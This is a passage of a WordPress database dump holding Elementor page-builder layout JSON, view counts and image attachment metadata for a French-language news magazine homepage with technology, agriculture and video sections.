"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3038,913,'_elementor_version','0.4'),(3039,913,'_elementor_css','a:3:{s:4:\"time\";i:1509550057;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3041,909,'post_views_count','831'),(3042,914,'_wp_attached_file','2017/11/Bhoye.jpg'),(3043,914,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:640;s:4:\"file\";s:17:\"2017/11/Bhoye.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Bhoye-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Bhoye-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3052,603,'_li_love_count','1'),(3053,681,'_li_love_count','1'),(3054,918,'_elementor_edit_mode','builder'),(3055,918,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom